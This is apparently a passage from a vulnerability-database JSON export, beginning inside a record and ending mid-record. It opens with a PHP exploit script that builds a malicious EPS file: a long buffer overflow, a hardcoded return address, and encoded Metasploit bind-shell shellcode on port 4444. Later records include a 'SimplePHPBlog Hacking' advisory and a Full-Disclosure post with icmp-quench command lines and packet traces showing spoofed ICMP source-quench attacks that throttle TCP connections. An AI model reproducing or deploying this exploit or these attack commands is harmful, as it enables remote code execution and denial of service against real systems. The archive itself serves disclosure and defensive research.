\"\\x51\\x30\\x45\\x51\\x4a\\x4b\\x47\\x39\\x4c\\x4b\\x50\\x34\\x4c\\x4b\" .\r\n \"\\x43\\x31\\x4a\\x4e\\x50\\x31\\x49\\x50\\x4a\\x39\\x4e\\x4c\\x4d\\x54\" .\r\n \"\\x49\\x50\\x44\\x34\\x45\\x57\\x49\\x51\\x48\\x4a\\x44\\x4d\\x43\\x31\" .\r\n \"\\x49\\x52\\x4a\\x4b\\x4a\\x54\\x47\\x4b\\x46\\x34\\x47\\x54\\x43\\x34\" .\r\n \"\\x43\\x45\\x4a\\x45\\x4c\\x4b\\x51\\x4f\\x47\\x54\\x43\\x31\\x4a\\x4b\" .\r\n \"\\x45\\x36\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\" .\r\n \"\\x45\\x51\\x4a\\x4b\\x4c\\x4b\\x45\\x4c\\x4c\\x4b\\x43\\x31\\x4a\\x4b\" .\r\n \"\\x4d\\x59\\x51\\x4c\\x47\\x54\\x44\\x44\\x48\\x43\\x51\\x4f\\x50\\x31\" .\r\n \"\\x4b\\x46\\x43\\x50\\x46\\x36\\x45\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\" .\r\n \"\\x4c\\x4b\\x47\\x30\\x44\\x4c\\x4c\\x4b\\x42\\x50\\x45\\x4c\\x4e\\x4d\" .\r\n \"\\x4c\\x4b\\x42\\x48\\x43\\x38\\x4b\\x39\\x4a\\x58\\x4c\\x43\\x49\\x50\" .\r\n \"\\x42\\x4a\\x46\\x30\\x42\\x48\\x4c\\x30\\x4d\\x5a\\x44\\x44\\x51\\x4f\" .\r\n \"\\x45\\x38\\x4d\\x48\\x4b\\x4e\\x4c\\x4a\\x44\\x4e\\x51\\x47\\x4b\\x4f\" .\r\n \"\\x4d\\x37\\x42\\x43\\x42\\x4d\\x42\\x44\\x46\\x4e\\x45\\x35\\x43\\x48\" .\r\n \"\\x42\\x45\\x51\\x30\\x46\\x4f\\x45\\x33\\x47\\x50\\x42\\x4e\\x42\\x45\" .\r\n \"\\x42\\x54\\x51\\x30\\x43\\x45\\x43\\x43\\x45\\x35\\x43\\x42\\x51\\x30\" .\r\n \"\\x45\\x31\\x45\\x34\\x42\\x4f\\x42\\x42\\x43\\x55\\x47\\x50\\x42\\x4b\" .\r\n \"\\x45\\x39\\x42\\x4c\\x42\\x4c\\x42\\x53\\x51\\x30\\x46\\x4f\\x51\\x51\" .\r\n \"\\x47\\x34\\x50\\x44\\x51\\x30\\x47\\x56\\x51\\x36\\x51\\x30\\x42\\x4e\" .\r\n \"\\x42\\x45\\x44\\x34\\x47\\x50\\x42\\x4c\\x42\\x4f\\x42\\x43\\x45\\x31\" .\r\n \"\\x42\\x4c\\x43\\x57\\x43\\x42\\x42\\x4f\\x44\\x35\\x44\\x30\\x47\\x50\" .\r\n \"\\x47\\x31\\x42\\x44\\x42\\x4d\\x42\\x49\\x42\\x4e\\x45\\x39\\x42\\x53\" .\r\n \"\\x43\\x44\\x42\\x52\\x45\\x31\\x43\\x44\\x42\\x4f\\x44\\x32\\x44\\x33\" .\r\n \"\\x51\\x30\\x45\\x31\\x45\\x34\\x42\\x4f\\x43\\x52\\x42\\x45\\x47\\x50\" .\r\n \"\\x46\\x4f\\x47\\x31\\x47\\x34\\x51\\x54\\x45\\x50\\x41\\x41\";\r\n \r\n # windows/shell_bind_tcp - 696 bytes\r\n # http://www.metasploit.com\r\n # Encoder: x86/alpha_mixed\r\n # EXITFUNC=seh, LPORT=4444, RHOST=\r\n $_scode_ii = \"\\x89\\xe5\\xda\\xd0\\xd9\\x75\\xf4\\x5e\\x56\\x59\\x49\\x49\\x49\\x49\" .\r\n \"\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\" .\r\n \"\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\" .\r\n \"\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\" .\r\n \"\\x42\\x75\\x4a\\x49\\x4b\\x4c\\x43\\x5a\\x4a\\x4b\\x50\\x4d\\x4d\\x38\" .\r\n \"\\x4b\\x49\\x4b\\x4f\\x4b\\x4f\\x4b\\x4f\\x45\\x30\\x4c\\x4b\\x42\\x4c\" .\r\n \"\\x46\\x44\\x51\\x34\\x4c\\x4b\\x47\\x35\\x47\\x4c\\x4c\\x4b\\x43\\x4c\" .\r\n \"\\x43\\x35\\x43\\x48\\x43\\x31\\x4a\\x4f\\x4c\\x4b\\x50\\x4f\\x42\\x38\" .\r\n \"\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a\\x4b\\x51\\x59\\x4c\\x4b\" .\r\n \"\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x50\\x31\\x49\\x50\\x4a\\x39\" .\r\n \"\\x4e\\x4c\\x4d\\x54\\x49\\x50\\x43\\x44\\x45\\x57\\x49\\x51\\x49\\x5a\" .\r\n \"\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4c\\x34\\x47\\x4b\\x50\\x54\" .\r\n \"\\x51\\x34\\x46\\x48\\x43\\x45\\x4b\\x55\\x4c\\x4b\\x51\\x4f\\x47\\x54\" .\r\n \"\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x4c\\x4b\" .\r\n \"\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x45\\x53\\x46\\x4c\\x4c\\x4b\" .\r\n \"\\x4b\\x39\\x42\\x4c\\x47\\x54\\x45\\x4c\\x45\\x31\\x48\\x43\\x46\\x51\" . \r\n \"\\x49\\x4b\\x45\\x34\\x4c\\x4b\\x50\\x43\\x50\\x30\\x4c\\x4b\\x51\\x50\" .\r\n \"\\x44\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x51\\x50\" .\r\n \"\\x43\\x38\\x51\\x4e\\x45\\x38\\x4c\\x4e\\x50\\x4e\\x44\\x4e\\x4a\\x4c\" .\r\n \"\\x50\\x50\\x4b\\x4f\\x48\\x56\\x45\\x36\\x50\\x53\\x43\\x56\\x45\\x38\" .\r\n \"\\x50\\x33\\x46\\x52\\x45\\x38\\x44\\x37\\x43\\x43\\x47\\x42\\x51\\x4f\" .\r\n \"\\x51\\x44\\x4b\\x4f\\x4e\\x30\\x45\\x38\\x48\\x4b\\x4a\\x4d\\x4b\\x4c\" .\r\n \"\\x47\\x4b\\x50\\x50\\x4b\\x4f\\x49\\x46\\x51\\x4f\\x4c\\x49\\x4a\\x45\" .\r\n \"\\x45\\x36\\x4b\\x31\\x4a\\x4d\\x43\\x38\\x43\\x32\\x51\\x45\\x42\\x4a\" .\r\n \"\\x45\\x52\\x4b\\x4f\\x48\\x50\\x45\\x38\\x4e\\x39\\x44\\x49\\x4b\\x45\" .\r\n \"\\x4e\\x4d\\x46\\x37\\x4b\\x4f\\x48\\x56\\x50\\x53\\x46\\x33\\x51\\x43\" .\r\n \"\\x51\\x43\\x46\\x33\\x51\\x53\\x46\\x33\\x51\\x53\\x46\\x33\\x4b\\x4f\" .\r\n \"\\x4e\\x30\\x45\\x36\\x45\\x38\\x42\\x31\\x51\\x4c\\x45\\x36\\x46\\x33\" .\r\n \"\\x4b\\x39\\x4d\\x31\\x4a\\x35\\x42\\x48\\x4e\\x44\\x44\\x5a\\x42\\x50\" .\r\n \"\\x49\\x57\\x51\\x47\\x4b\\x4f\\x49\\x46\\x43\\x5a\\x44\\x50\\x50\\x51\" .\r\n \"\\x51\\x45\\x4b\\x4f\\x48\\x50\\x42\\x48\\x49\\x34\\x4e\\x4d\\x46\\x4e\" .\r\n \"\\x4d\\x39\\x51\\x47\\x4b\\x4f\\x48\\x56\\x51\\x43\\x51\\x45\\x4b\\x4f\" .\r\n \"\\x48\\x50\\x42\\x48\\x4d\\x35\\x51\\x59\\x4b\\x36\\x51\\x59\\x50\\x57\" .\r\n \"\\x4b\\x4f\\x4e\\x36\\x46\\x30\\x50\\x54\\x46\\x34\\x51\\x45\\x4b\\x4f\" .\r\n \"\\x4e\\x30\\x4c\\x53\\x45\\x38\\x4d\\x37\\x43\\x49\\x48\\x46\\x44\\x39\" .\r\n \"\\x50\\x57\\x4b\\x4f\\x4e\\x36\\x46\\x35\\x4b\\x4f\\x4e\\x30\\x43\\x56\" .\r\n \"\\x42\\x4a\\x43\\x54\\x42\\x46\\x43\\x58\\x45\\x33\\x42\\x4d\\x4d\\x59\" .\r\n \"\\x4d\\x35\\x43\\x5a\\x46\\x30\\x51\\x49\\x47\\x59\\x48\\x4c\\x4b\\x39\" .\r\n \"\\x4d\\x37\\x43\\x5a\\x50\\x44\\x4d\\x59\\x4b\\x52\\x50\\x31\\x49\\x50\" .\r\n \"\\x4c\\x33\\x4e\\x4a\\x4b\\x4e\\x47\\x32\\x46\\x4d\\x4b\\x4e\\x47\\x32\" .\r\n \"\\x46\\x4c\\x4c\\x53\\x4c\\x4d\\x43\\x4a\\x46\\x58\\x4e\\x4b\\x4e\\x4b\" .\r\n \"\\x4e\\x4b\\x43\\x58\\x42\\x52\\x4b\\x4e\\x48\\x33\\x44\\x56\\x4b\\x4f\" .\r\n \"\\x44\\x35\\x47\\x34\\x4b\\x4f\\x48\\x56\\x51\\x4b\\x51\\x47\\x46\\x32\" .\r\n \"\\x46\\x31\\x50\\x51\\x50\\x51\\x42\\x4a\\x45\\x51\\x50\\x51\\x50\\x51\" .\r\n \"\\x51\\x45\\x50\\x51\\x4b\\x4f\\x4e\\x30\\x42\\x48\\x4e\\x4d\\x49\\x49\" .\r\n \"\\x43\\x35\\x48\\x4e\\x51\\x43\\x4b\\x4f\\x49\\x46\\x43\\x5a\\x4b\\x4f\" .\r\n \"\\x4b\\x4f\\x50\\x37\\x4b\\x4f\\x4e\\x30\\x4c\\x4b\\x46\\x37\\x4b\\x4c\" .\r\n \"\\x4d\\x53\\x48\\x44\\x45\\x34\\x4b\\x4f\\x4e\\x36\\x50\\x52\\x4b\\x4f\" .\r\n \"\\x4e\\x30\\x42\\x48\\x4a\\x50\\x4d\\x5a\\x44\\x44\\x51\\x4f\\x50\\x53\" .\r\n \"\\x4b\\x4f\\x4e\\x36\\x4b\\x4f\\x48\\x50\\x41\\x41\";\r\n \r\n $_eip = \"\\x57\\x6b\\x41\\x77\"; //0x77416b57 alphabetic call esi, comctl32.dll\r\n \r\n $_boom = \"\\xc5\\xd0\\xd3\\xc6\\x20\\x00\\x00\\x00\\x05\\xc8\\x04\\x00\\x00\\x00\".\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00%\\xc8\\x04\\x00\\xb5I\\x01\\x00\\xff\".\r\n \"\\xff\\x00\\x00\".\r\n \"%!PS-Adobe-3.1\\x20EPSF-3.0\\r\\n\".\r\n \"%ADO_DSC_Encoding:\\x20Windows\\x20Roman\\r\\n\".\r\n \"%\".\r\n str_repeat(\"A\", 41699).\r\n $_eip.\r\n str_repeat(\"A\", 2291).\r\n \"%Title:\\x20Untitled-1.eps\\r\\n\".\r\n \"%AAAAAAAA\". // we jump here, nop-equivalent\r\n $_scode_ii.\r\n \": A\\r\\n\".\r\n \"%%For:\\x20alias\\r\\n\".\r\n \"%%CreationDate:\\x2011/27/2009\\r\\n\".\r\n \"%%BoundingBox:\\x200\\x200\\x20227\\x20171\\r\\n\".\r\n \"%%HiResBoundingBox:\\x200\\x200\\x20226.5044\\x20170.3165\\r\\n\".\r\n \"%%CropBox:\\x200\\x200\\x20226.5044\\x20170.3165\\r\\n\".\r\n \"%%LanguageLevel:\\x202\\r\\n\".\r\n \"%%DocumentData:\\x20Clean7Bit\\r\\n\".\r\n \"%ADOBeginClientInjection:\\x20DocumentHeader\\x20\\\"AI11EPS\\\"\\r\\n\".\r\n \"%%AI8_CreatorVersion:\\x2014.0.0\\r\".\r\n \"%AI9_PrintingDataBegin\\r\".\r\n \"%ADO_BuildNumber:\\x20Adobe\\x20Illustrator(R)\\x2014.0.0\\x20x367\\x20R\\x20agm\\x204.4890\\x20ct\\x205.1541\\r\".\r\n \"%ADO_ContainsXMP:\\x20MainFirst\\r\".\r\n \"%AI7_Thumbnail:\\x20128\\x2096\\x208\\r\".\r\n \"%%BeginData:\\x204096\\x20Hex\\x20Bytes\\r\".\r\n \"%0000330000660000990000CC0033000033330033660033990033CC0033FF\\r\\n\";\r\n file_put_contents(\"9sg.eps\", $_boom);\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-04-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8172"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "description": "How to hack a server with Simple PHP Blog\r\nuploading an htacess file from\r\nimg_upload_cgi.php page.\r\nTested on v0.4.9\r\n\r\nby Demential\r\n\r\nhttp://www.hackish.eu\r\nmailto: deme@hackish.eu\r\n\r\nvideo here: http://hackish.eu/video/phpblog.avi\r\nvlc download: http://www.videolan.org/vlc/", "modified": "2007-09-21T00:00:00", "published": "2007-09-21T00:00:00", "id": "SECURITYVULNS:DOC:18038", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18038", "title": "SimplePHPBlog Hacking", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-09-21T00:00:00", "published": "2007-09-21T00:00:00", "id": "SECURITYVULNS:VULN:8172", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8172", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "description": "Folks,\r\n\r\nIt seems worthless to try to explain over and over again how trivial it is \r\nto perform ICMP-based attacks against TCP. So I have posted on my web site \r\n(http://www.gont.com.ar/tools/icmp-attacks) the same tools that vendors \r\nwere supposed to use to audit their systems, and test their patches.\r\n\r\nHere is a packet trace that shows the blind throughput-reduction attack in \r\naction, with explanations inline.\r\n\r\nScenario:\r\nWeb-browser (10.0.0.1, TCP port 1063) is downloading a large file from a \r\nweb-server (192.168.0.1, TCP port 80)\r\nFor simplicity-sake, let's assume we know the four-tuple that identifies \r\nthe TCP connection (keep reading for an example in which we don't):\r\n\r\nLet's perform the attack.\r\n\r\n# icmp-quench -c 10.0.0.1:1063 -s 192.168.0.1:80 -t server -r 100\r\n\r\n(The client is at 10.0.0.1, using TCP port 1063. The server is at \r\n192.168.0.1, using port 80. Let's attack the server ("-t server"). Limit \r\nthe throughput used for the *attack* to about 100 kbps)\r\n\r\n\r\n01:47:56.830156 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 71, id 3721) (ttl 188, id 38453)\r\n01:47:56.950062 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 124, id 15000) (ttl 61, id 34927)\r\n01:47:57.070066 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 229, id 25845) (ttl 250, id 45209)\r\n01:47:57.079918 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 291649 win 7312 <nop,nop,timestamp 32232 447226421> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 45064)\r\n\r\nSee that the client (10.0.0.1) advertises a window of 7312 bytes. Thus, as \r\nfar as TCP *flow* control is concerned, the webserver could send as many \r\nbytes as 7312.\r\n\r\n\r\n01:47:57.190091 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 222, id 42066) (ttl 123, id 18038)\r\n01:47:57.310057 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 83, id 45730) (ttl 136, id 41605)\r\n01:47:57.400762 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 293097 win 8760 <nop,nop,timestamp 32235 447226421> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 45320)\r\n01:47:57.430069 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 104, id 26156) (ttl 85, id 48347)\r\n01:47:57.550065 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 249, id 14568) (ttl 238, id 44119)\r\n01:47:57.670079 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 242, id 49311) (ttl 151, id 10965)\r\n01:47:57.746505 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 294545 win 7312 <nop,nop,timestamp 32238 447226423> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 45576)\r\n\r\n\r\nHowever, the ICMP source quench messages have put the connection in the \r\nslow start phase, and thus the server will send only one packet. That is, \r\nTCP's congestion control won't allow the server's TCP to send more than 1 \r\nsegment.\r\n\r\n\r\nThis is the server's data segment:\r\n\r\n01:47:57.750082 192.168.0.1.80 > 10.0.0.1.1063: . 295993:297441(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226426 32238> (DF) (ttl 64, id 16156)\r\n\r\nHowever, the attacker sends another Source Quench:\r\n\r\n01:47:57.790067 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 63, id 14055) (ttl 108, id 3600)\r\n\r\nAnd thus cwnd will be set back to 1, allowing the server to send only one \r\nsegment:\r\n\r\n\r\n01:47:57.832648 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 295993 win 8760 <nop,nop,timestamp 32238 447226423> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 45832)\r\n01:47:57.836227 192.168.0.1.80 > 10.0.0.1.1063: . 297441:298889(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226426 32238> (DF) (ttl 64, id 4839)\r\n01:47:57.910080 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 232, id 61992) (ttl 161, id 53393)\r\n01:47:58.030075 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 161, id 60570) (ttl 98, id 2081)\r\n01:47:58.150060 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 118, id 15382) (ttl 171, id 61130)\r\n01:47:58.270074 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 131, id 39528) (ttl 116, id 55998)\r\n01:47:58.390072 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 136, id 57047) (ttl 249, id 50387)\r\n\r\n\r\nHave a look at the following pattern:\r\n\r\n01:47:58.472928 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 297441 win 7312 <nop,nop,timestamp 32245 447226426> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 47368)\r\n01:47:58.476517 192.168.0.1.80 > 10.0.0.1.1063: . 298889:300337(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226427 32245> (DF) (ttl 64, id 8494)\r\n01:47:58.510066 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 77, id 32815) (ttl 174, id 50351)\r\n\r\nThe web server receives an ACK, so it sends a data segment. But it then \r\nreceives a number of source quench messages, which will keep cwnd at 1. \r\nThus, the throughput of the connection gets limited to one packet per RTT \r\n(round-trip time).\r\n\r\n\r\n01:47:58.630074 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 66, id 6352) (ttl 187, id 37417)\r\n01:47:58.681557 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 298889 win 8760 <nop,nop,timestamp 32247 447226426> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 47624)\r\n01:47:58.685134 192.168.0.1.80 > 10.0.0.1.1063: . 300337:301785(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226427 32247> (DF) (ttl 64, id 28561)\r\n01:47:58.750068 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 195, id 57048) (ttl 144, id 1692)\r\n01:47:58.877803 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 152, id 10915) (ttl 169, id 39043)\r\n01:47:58.990060 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 109, id 62567) (ttl 166, id 57565)\r\n01:47:59.110058 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 122, id 21511) (ttl 199, id 5731)\r\n01:47:59.230059 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 139, id 650) (ttl 72, id 37585)\r\n01:47:59.236658 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 300337 win 7312 <nop,nop,timestamp 32252 447226427> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 48136)\r\n01:47:59.240247 192.168.0.1.80 > 10.0.0.1.1063: . 301785:303233(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226429 32252> (DF) (ttl 64, id 13370)\r\n01:47:59.350084 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 96, id 54804) (ttl 97, id 19491)\r\n01:47:59.443666 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 301785 win 8760 <nop,nop,timestamp 32254 447226427> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 48392)\r\n01:47:59.447243 192.168.0.1.80 > 10.0.0.1.1063: . 303233:304681(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226429 32254> (DF) (ttl 64, id 16919)\r\n01:47:59.470072 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 97, id 18598) (ttl 206, id 23717)\r\n01:47:59.590078 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 194, id 61461) (ttl 111, id 31369)\r\n01:47:59.710058 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 103, id 1646) (ttl 152, id 32425)\r\n01:47:59.830059 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 180, id 58070) (ttl 205, id 57556)\r\n01:47:59.950061 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 229, id 31980) (ttl 206, id 14368)\r\n01:47:59.993763 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 303233 win 7312 <nop,nop,timestamp 32259 447226429> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 48904)\r\n01:47:59.997340 192.168.0.1.80 > 10.0.0.1.1063: . 304681:306129(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226430 32259> (DF) (ttl 64, id 1204)\r\n01:48:00.070067 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 254, id 60533) (ttl 211, id 48718)\r\n01:48:00.190061 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 143, id 59926) (ttl 248, id 51853)\r\n01:48:00.202233 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 304681 win 8760 <nop,nop,timestamp 32261 447226429> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 49160)\r\n01:48:00.205809 192.168.0.1.80 > 10.0.0.1.1063: . 306129:307577(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226430 32261> (DF) (ttl 64, id 15196)\r\n01:48:00.310067 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 132, id 20147) (ttl 89, id 21594)\r\n01:48:00.430069 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 221, id 37084) (ttl 134, id 29832)\r\n01:48:00.556726 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 238, id 18625) (ttl 79, id 57860)\r\n01:48:00.634932 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 306129 win 7312 <nop,nop,timestamp 32265 447226430> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 49672)\r\n01:48:00.638510 192.168.0.1.80 > 10.0.0.1.1063: . 307577:309025(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226431 32265> (DF) (ttl 64, id 27896)\r\n01:48:00.670072 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 187, id 44726) (ttl 132, id 30216)\r\n01:48:00.779869 10.0.0.1.1063 > 192.168.0.1.80: . [tcp sum ok] 232:232(0) \r\nack 307577 win 8760 <nop,nop,timestamp 32266 447226430> (DF) [tos 0xf (EC)] \r\n(ttl 116, id 49928)\r\n01:48:00.783399 192.168.0.1.80 > 10.0.0.1.1063: . 309025:310473(1448) ack \r\n232 win 17376 <nop,nop,timestamp 447226432 32266> (DF) (ttl 64, id 12684)\r\n01:48:00.790070 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 252, id 6804) (ttl 201, id 43029)\r\n01:48:00.910060 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 173, id 33976) (ttl 182, id 4152)\r\n01:48:01.030059 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 194, id 1202) (ttl 239, id 59037)\r\n01:48:01.150071 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 215, id 21023) (ttl 188, id 33475)\r\n01:48:01.270057 10.0.0.1 > 192.168.0.1: icmp: source quench for \r\n192.168.0.1.80 > 10.0.0.1.1063: [|tcp] (ttl 108, id 18051) (ttl 109, id 56328)\r\n\r\n\r\nWe have limited the throughput of the connection to about one packet per \r\nround-trip time.\r\n\r\n\r\nNow, what if we don't know the client port?\r\n\r\nThat's not a problem. It's still pretty easy. You can make icmp-quench try \r\nall the possible port numbers for the client:\r\n\r\n# icmp-quench -c 10.0.0.1:1-65535 -s 192.168.0.1:80 -t server -r 100\r\n\r\n\r\nBut attackers are usually a bit more clever than that. Let's say the \r\nattacker has some tool for OS fingerprinting (nmap, for example).\r\nLet's say he discovers the web server is running Windows. Googling a bit, \r\nthe attacker will know that Windows chooses the port numbers for outgoing \r\nconnections from the range 1024-4999. Thus, he can use icmp-quench this way:\r\n\r\n# icmp-quench -c 10.0.0.1:1024-4999 -s 192.168.0.1:80 -t server -r 100\r\n\r\nBy default, icmp-quench spoofes the source address of the ICMP packets (it \r\nwill use the IP address of the peer that is *not* being attacked... that's \r\nwhy the ICMP packets come from 10.0.0.1 in the packet trace).\r\n\r\nLet's say the attacker now wants to use the address 200.200.0.1 as the \r\nsource address of his packets (to avoid being egress-filtered, for example):\r\n\r\n# icmp-quench -c 10.0.0.1:1024-4999 -s 192.168.0.1:80 -t server -r 100 -f \r\n200.200.0.1\r\n\r\nThe tools have many other options. Run the tool with no options, and learn \r\nabout them\r\nBtw, all the packet fields, when it makes sense, are set by default to some \r\nrandom number (just to avoid your IDS/Firewall messing with your audit tests).\r\n\r\nThe icmp-quench tool is available at \r\nhttp://www.gont.com.ar/tools/icmp-attacks .\r\n\r\nShare it with the people that told you these attacks were not easy to \r\nperform, and show them the packet traces you obtain.\r\n\r\nKindest regards,\r\n\r\n--\r\nFernando Gont\r\ne-mail: fernando@gont.com.ar || fgont@acm.org\r\n\r\n\r\n\r\n\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2005-07-20T00:00:00", "published": "2005-07-20T00:00:00", "id": "SECURITYVULNS:DOC:9242", "href": 